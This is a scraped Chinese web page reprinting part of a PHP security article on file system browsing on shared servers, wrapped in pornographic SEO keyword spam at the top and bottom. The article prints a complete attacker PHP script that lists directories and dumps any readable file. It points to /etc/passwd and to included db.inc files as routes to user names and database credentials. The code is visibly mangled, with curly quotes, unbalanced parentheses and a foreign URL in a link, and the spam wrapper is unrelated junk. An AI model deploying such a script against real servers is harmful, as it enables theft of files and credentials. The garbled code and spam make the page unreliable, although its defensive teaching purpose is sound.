av一区二区在线观看_亚洲男人的天堂网站_日韩亚洲视频_在线成人免费_欧美日韩精品免费观看视频_久草视

您的位置:首頁技術文章
文章詳情頁

PHP安全-文件系統瀏覽

瀏覽:82日期:2022-09-11 18:04:01
文件系統瀏覽

除了能在共享服務器上讀取任意文件之外,攻擊者還能建立一個可以瀏覽文件系統的腳本。由于你的大多數敏感文件不會保存在網站主目錄下,此類腳本一般用于找到你的源文件的所在位置。請看下例:

<pre>

<?php

if (isset($_GET[’dir’]))

{

ls($_GET[’dir’]);

}

elseif (isset($_GET[’file’]))

{

cat($_GET[’file’]);

}

else

{

ls(’/’);

}

function cat($file)

{

echo htmlentities(file_get_contents($file), ENT_QUOTES, ’UTF-8’));

}

function ls($dir)

{

$handle = dir($dir);

while ($filename = $handle->read())

{

$size = filesize('$dir$filename');

if (is_dir('$dir$filename'))

{

$type = ’dir’;

$filename .= ’/’;

}

else

{

$type = ’file’;

}

if (is_readable('$dir$filename'))

{

$line = str_pad($size, 15);

$line .= '<a href='http://m.4tl426be.cn/bcjs/{$_SERVER[’PHP_SELF’]}';

$line .= '?$type=$dir$filename'>$filename</a>';

}

else

{

$line = str_pad($size, 15);

$line .= $filename;

}

echo '$linen';

}

$handle->close();

}

?>

</pre>

攻擊者可能會首先察看/etc/passwd文件或/home目錄以取得該服務器上的用戶名清單;可以通過語言的結構如include或require來發現保存在網站主目錄以外的源文件所在位置。例如,考慮一下下面的腳本文件/home/victim/public_html/admin.php:

<?php

include ’../inc/db.inc’;

/* ... */

?>

如果攻擊者設法顯示了該文件的源碼,就可以發現db.inc的所在位置,同時他可以使用readfile()函數來使其內容暴露,取得了數據庫的訪問權限。這樣,在這個環境中保存db.inc于網站主目錄之外的做法并未起到保護作用。

這一攻擊說明了為什么要把共享服務器上的所有源文件看成是公開的,并要選擇數據庫實現所有敏感數據的保存。

標簽: PHP
相關文章:
主站蜘蛛池模板: 成人在线观看欧美 | 99久久精品免费看国产四区 | 99精品视频一区二区三区 | 国产在线拍偷自揄拍视频 | 精品一区二区三区四区五区 | 久久精彩视频 | 91精品国产色综合久久 | 亚洲成人av在线播放 | 国产美女精品 | 国产精品a久久久久 | 日韩一区二区三区四区五区 | 密乳av| 99热播精品 | 欧美日韩一区二区在线观看 | 国产成人99久久亚洲综合精品 | 国产精品视频免费观看 | 国产精品久久久久久久久久久久冷 | 成人婷婷| 日本天天操 | 97精品超碰一区二区三区 | 亚洲va欧美va天堂v国产综合 | 国产日韩欧美一区 | 亚洲一级毛片 | 国产99久久精品一区二区永久免费 | 亚洲精品电影网在线观看 | 暖暖成人免费视频 | 一二三区在线 | 一区二区三区在线免费观看视频 | 精品在线一区 | 亚洲国产成人av | 97久久久 | 国产成人在线视频 | 日本天堂视频在线观看 | 91 在线| 久草资源在线视频 | 色香蕉在线 | 欧美日韩在线高清 | 亚洲精品一区二区三区在线 | 欧美精品欧美精品系列 | 久久成人一区二区三区 | 国产在线激情视频 |